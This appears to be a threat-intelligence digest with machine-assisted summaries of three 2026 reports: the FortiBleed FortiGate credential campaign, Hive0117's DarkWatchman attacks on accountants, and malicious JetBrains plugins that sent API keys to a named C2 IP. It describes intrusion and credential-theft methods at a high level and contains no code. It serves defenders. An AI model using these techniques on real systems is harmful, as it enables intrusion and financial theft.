#threatreport #MediumCompleteness Inside the FortiBleed Open Directory: A Technical Analysis of What the Attacker Left Behind | 19-06-2026 Source: cloudsek.com/blog/inside-th… Key details below ↓ 🧑‍💻Actors/Campaigns: Fortibleed 💀Threats: Impacket_tool, Password_spray_technique, Credential_harvesting_technique, 🎯Victims: Telecommunications, Internet service providers, Organisations running exposed fortios management interfaces 🏭Industry: Telco 🌐Geo: Mexico, Taiwan, India, Turkey, Asia, Colombia, United states 🤖LLM extracted TTPs:` T1040, T1078, T1087.002, T1110, T1110.002, T1110.003, T1110.004, T1133, T1135, T1552, ... 🧨IOCs: - File: 11 - IP: 9 💽Software: Telegram, Active Directory 🔢Algorithms: sha256, pbkdf2 #threatreport: FortiBleed is an extensive credential-compromise campaign actively targeting Fortinet FortiGate firewalls and SSL VPN gateways on the internet. It is characterized not as a software vulnerability or a zero-day exploit but as the result of a database compiled by a threat actor through credential reuse, brute force attacks, and offline hash cracking against exposed devices. The evidence left by attackers includes various scripts and tools categorized into distinct operational layers. Layer 1 consists of credential data gathered from device configuration exports via exposed management interfaces, containing legacy salted-SHA256 and newer PBKDF2 format hashes that identify firewall administrators. However, attribution based on FordiGuard license registration emails is problematic, as many high-profile credentials link to contractors or subsidiaries rather than the corporations themselves. Layer 2 involves advanced credential capture techniques like Kerberos pre-authentication data acquired through network sniffing after network pivoting, which reveals internal Active Directory domain names from the victim's infrastructure. The operational toolkit indicates the campaign's capability to extend beyond the firewall itself, utilizing tools such as ad_enum.py for enumerating Active Directory over LDAP and conducting password spraying against internal domain controllers with scripts like spray_admin.sh. The reported cracking power was linked to a modest configuration of rented GPU instances rather than a dedicated cluster, revealing a potential underestimation of the campaign’s resources. The dataset, termed targets_300M_plus.txt, ranks SSH and VPN endpoints by revenue, confirming that the attackers had usable access rather than merely cracked password lists. While the attackers’ origins remain difficult to pin down, some linguistic clues in their tooling hint at Russian influence, though numerous named passwords suggest connections to Persian regions as well. Regarding the extent of the compromise, India has the highest number of affected devices, followed by the United States and Taiwan. Despite the reported presence of approximately 21,000 compromised domains, most belong to internal network names that are not externally traceable, thus over-reporting the actual compromised organizations. The mix of public and non-routable domain entries suggests a wide-reaching campaign that indiscriminately scanned for exposed Fortinet products without specific targeting. Given the operation's sophistication, organizations with exposed FortiOS management interfaces are advised to treat their credentials as compromised. Recommended mitigation strategies include removing public exposure of the management interfaces, rotating administrator and VPN credentials, enforcing multi-factor authentication, and ensuring that devices are updated to the latest FortiOS, thereby securing the integrity of access control systems. Additionally, organizations should audit for backdoor accounts and unusual login patterns, replacing devices when signs of compromise are evident.

#threatreport #HighCompleteness Honeypot: Investigating Attacks by the Hive0117 Group on Accountants at Companies in Russia and CIS Countries | 18-06-2026 Source: f6.ru/blog/honey-tra… Key details below ↓ 🧑‍💻Actors/Campaigns: Watch_wolf (🧠motivation: financially_motivated, cyber_criminal) 💀Threats: Darkwatchman, Lite_manager_tool, Bitrat, Hvnc_tool, Shadow_copies_delete_technique, 🎯Victims: Accountants, Finance departments, Legal entities, Companies in russia, Organizations in the commonwealth of independent states 🏭Industry: Telco, Chemical, Financial, Retail 🌐Geo: Russian, Kazakhstan, Belarus, Russia, Uzbekistan 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1010, T1012, T1027, T1027.004, T1036, T1041, T1053.005, T1056.001, T1059.001, T1059.003, ... 🧨IOCs: - File: 9 - Command: 1 - Hash: 12 - Domain: 30 - IP: 2 💽Software: Telegram, VKontakte, Viber, WhatsApp, Android, Windows registry, Chrome, Firefox 🔢Algorithms: md5, sha1, sha256 🔠Functions: PowerShell, SetWindowsHookEx 📜Programming Languages: javascript, powershell #threatreport: The attacks conducted by the financially motivated Hive0117 group have intensified in 2026, primarily targeting accountants within companies across Russia and the CIS nations. This group, which has been active since late 2021, employs a range of sophisticated techniques and malware, most notably the fileless malware known as DarkWatchman. The primary goal of these attacks is to infiltrate online banking systems to siphon money into accounts controlled by the attackers, often disguising the transactions as legitimate payroll transfers. The modus operandi of Hive0117 involves sending phishing emails that appear to be legitimate documents, which conceal the DarkWatchman malware in RAR archives. These emails contain subject lines designed to entice accountants, such as "Invoice," "Delivery Note," and "Outstanding Payment." To bypass detection by email filters, the malware is encrypted and passphrased, with the passwords included in the email body. When the recipient unpacks the RAR archive, they inadvertently execute the malicious payload, enabling the attackers to infiltrate their devices. Post-installation, DarkWatchman operates by gathering sensitive information, such as keystrokes and clipboard contents, especially focusing on tracking any cryptographic tokens used for accessing corporate banking systems. Once the attackers ascertain the presence of a token on an infected device, they can escalate their access by deploying additional remote access tools like LiteManager or BitRAT. This allows them to manipulate the compromised machines directly, executing payment transactions that appear legitimate to anti-fraud measures in place for corporate accounts. Hive0117's attack strategies not only leverage DarkWatchman but also integrate a keylogger module that compiles C# scripts to monitor user interactions. This keylogger not only captures keystrokes but also detects any smart cards connected to the workstation, enabling timely unauthorized actions when the token is detected. Further tactics include the use of HVNC (Hidden Virtual Network Computing) malware, which allows the attackers to create an unseen virtual desktop on the victim’s machine, facilitating more seamless control over the device while impersonating the user. This malware can manipulate the clipboard, execute scripts, and even manage browser sessions that access banking portals, showcasing the sophistication of Hive0117's operations. The evidence underscores that since the onset of 2026, Hive0117 has successfully executed approximately 400 attacks on Russian enterprises, with average financial losses from their operations escalating significantly within just a couple of months. The group's combination of advanced phishing techniques, nuanced malware functionalities, and controlled deployment strategies exemplifies a high-stakes financial cybercriminal operation, demanding serious attention and countermeasures from security teams.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 1

#threatreport #MediumCompleteness 15 Malicious JetBrains Plugins Stole AI API Keys from 70,000 Developers | 18-06-2026 Source: stepsecurity.io/blog/jetbrains… Key details below ↓ 💀Threats: Supply_chain_technique, Credential_stealing_technique, Trufflehog_tool, 🎯Victims: Software developers, Software development 🏭Industry: E-commerce 🌐Geo: Chinese, China 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1036, T1041, T1056, T1071.001, T1195.001 🧨IOCs: - IP: 1 - File: 8 - Url: 2 - Path: 1 💽Software: JetBrains, DeepSeek, OpenAI, Alibaba Cloud, macOS, Linux 🔠Functions: FindBugs, save, Gson 📜Programming Languages: java #threatreport: In June 2026, a coordinated supply chain attack targeted JetBrains, utilizing 15 malicious plugins on its Marketplace that masqueraded as AI-powered development tools. These plugins, published under seven different vendor accounts, claimed to offer functionalities such as code review and test generation while embedding hidden credential-stealing code. The attack leveraged a fundamental trust model, as developers typically expect plugins from reputable marketplaces to be secure. Upon entering an AI provider API key into the plugins, the keys were silently exfiltrated over unencrypted HTTP to a command-and-control server at the address 39.107.60.51, hosted on Alibaba Cloud in Beijing, China. Each plugin was designed with a save() method that validated the API key's format and stored new keys for exfiltration, demonstrating a careful approach to avoid detection. By employing a deduplication check, the attackers minimized network noise and detection risk. Furthermore, the absence of encryption in the data exfiltration process made interception trivial for defenders. The malicious plugins also included a "donation wall" feature, which required users to pay to receive a working API key in return—likely one already stolen from another victim. This allowed the attackers to create a self-sustaining revenue model while burdening original key owners with undesired API charges. Following security reports, JetBrains removed all 15 plugins from its Marketplace and permanently banned the associated vendor accounts while implementing a remote kill-switch to disable the extensions. An independent investigation confirmed that the C2 server remained operational three days later, indicating potential ongoing exploitation of stolen API keys and the possibility of pivoting to other platforms. Network detection measures for identifying compromised systems include monitoring outbound HTTP connections from IDE processes to the C2 IP address, searching for the malicious plugin identifiers on disk, inspecting network logs for connections to the C2 server, and auditing AI provider dashboards for compromised keys. Organizations are encouraged to revoke and rotate affected API keys, block the C2 server, and use secrets scanners to ensure no API keys were unintentionally exposed in source code. To streamline responses across developer teams, tools like Dev Machine Guard can inventory IDE extensions on a broader scale, allowing security teams to instantly identify impacted machines without relying on developers to self-report. This approach also ensures visibility across different IDEs, thereby enhancing detection capabilities against similar supply chain threats in the future.